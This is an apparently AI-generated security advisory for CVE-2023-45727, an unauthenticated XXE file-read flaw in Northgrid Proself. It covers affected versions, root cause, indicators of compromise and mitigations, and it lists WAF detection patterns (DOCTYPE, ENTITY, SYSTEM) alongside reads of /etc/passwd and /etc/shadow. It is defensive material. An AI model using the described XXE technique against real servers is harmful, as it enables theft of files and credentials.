CVE-2023-45727 Overview
CVE-2023-45727 is an XML External Entity (XXE) vulnerability affecting multiple editions of Northgrid's Proself file sharing and storage solution. The vulnerability allows a remote unauthenticated attacker to conduct XXE attacks by processing specially crafted requests containing malformed XML data. Successful exploitation enables attackers to read arbitrary files on the server, potentially exposing sensitive account information and confidential data.
Critical Impact
This vulnerability is actively exploited in the wild and has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, indicating confirmed malicious exploitation. Remote unauthenticated attackers can exfiltrate sensitive server files including account credentials.
Affected Products
- Proself Enterprise/Standard Edition Ver5.62 and earlier
- Proself Gateway Edition Ver1.65 and earlier
- Proself Mail Sanitize Edition Ver1.08 and earlier
Discovery Timeline
- October 18, 2023 - CVE-2023-45727 published to NVD
- October 24, 2025 - Last updated in NVD database
Technical Details for CVE-2023-45727
Vulnerability Analysis
This XXE vulnerability resides in the XML parsing functionality of Northgrid Proself products. The application fails to properly disable external entity processing when parsing XML input from user requests. This improper restriction of XML External Entity Reference (CWE-611) allows attackers to craft malicious XML payloads that instruct the XML parser to fetch external resources or local files.
The vulnerability is particularly severe because it requires no authentication to exploit. An attacker can simply send a crafted HTTP request to the vulnerable Proself server, and the XML parser will process the malicious payload without any access controls. The confidentiality impact is significant as attackers can read arbitrary files from the server's filesystem, including configuration files and account information that may contain credentials or sensitive business data.
Root Cause
The root cause is improper configuration of the XML parser within the Proself application. When processing incoming XML data, the application does not disable Document Type Definition (DTD) processing or external entity resolution. This allows attackers to define external entities that reference local files or external URLs, which the parser then resolves and includes in the response or error messages.
Attack Vector
The attack is conducted over the network without requiring any authentication or user interaction. An attacker sends a malicious HTTP request to the Proself server containing XML data with external entity declarations. When the server processes this XML, it resolves the external entities, allowing the attacker to:
- Read local files from the server filesystem (e.g., /etc/passwd, configuration files, database credentials)
- Perform server-side request forgery (SSRF) to internal network resources
- Potentially cause denial of service through recursive entity expansion (billion laughs attack)
The XXE attack typically involves crafting XML payloads that define external entities pointing to sensitive files. When the XML parser processes these entities, the file contents are included in the response or can be exfiltrated through out-of-band techniques to attacker-controlled servers.
Detection Methods for CVE-2023-45727
Indicators of Compromise
- Unusual HTTP requests to Proself endpoints containing XML payloads with <!DOCTYPE> declarations or <!ENTITY> definitions
- Server log entries showing access attempts to sensitive files like /etc/passwd, /etc/shadow, or application configuration files
- Outbound connections from the Proself server to unexpected external hosts (indicating out-of-band XXE exfiltration)
- HTTP requests containing common XXE payload patterns such as SYSTEM, PUBLIC, or file:// protocol handlers
Detection Strategies
- Monitor and alert on HTTP requests to Proself servers that contain XML payloads with entity declarations
- Implement Web Application Firewall (WAF) rules to detect and block common XXE payload patterns
- Configure network monitoring to detect unusual outbound connections from Proself servers
- Review Proself application logs for error messages that may indicate failed XXE exploitation attempts
Monitoring Recommendations
- Enable detailed logging on Proself servers to capture full request bodies for security analysis
- Deploy network intrusion detection systems (IDS) with signatures for XXE attack patterns
- Monitor file access patterns on the Proself server for unauthorized reads of sensitive system files
- Implement egress filtering to prevent data exfiltration through out-of-band XXE techniques
How to Mitigate CVE-2023-45727
Immediate Actions Required
- Update all Proself installations to the latest patched versions immediately (Enterprise/Standard Edition beyond Ver5.62, Gateway Edition beyond Ver1.65, Mail Sanitize Edition beyond Ver1.08)
- If immediate patching is not possible, consider temporarily restricting network access to Proself servers
- Review server logs for any signs of exploitation and investigate any suspicious XML-based requests
- Implement WAF rules to block requests containing XML external entity declarations as a temporary mitigation
Patch Information
Northgrid has released security updates to address this vulnerability. Administrators should upgrade to versions newer than the affected releases. Detailed patch information is available in the ProSelf Information Release. Additional technical details can be found in the JVN Advisory JVN95981460.
Given that this vulnerability is listed in CISA's Known Exploited Vulnerabilities catalog, federal agencies and organizations following CISA guidance should prioritize remediation according to the specified deadlines. The CISA KEV entry provides additional remediation guidance.
Workarounds
- Deploy a Web Application Firewall (WAF) configured to block XML payloads containing DOCTYPE declarations and ENTITY definitions
- Restrict network access to Proself servers to trusted IP ranges only until patches can be applied
- If possible, configure the underlying application server or XML parser to disable DTD processing and external entity resolution
- Implement network segmentation to limit the impact of potential file disclosure from compromised Proself servers
# Example WAF rule concepts for blocking XXE patterns
# Block requests containing DOCTYPE declarations
# Pattern: <!DOCTYPE
# Block requests containing ENTITY definitions
# Pattern: <!ENTITY
# Block requests with SYSTEM or PUBLIC keywords in XML context
# Consult your specific WAF documentation for implementation syntax
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
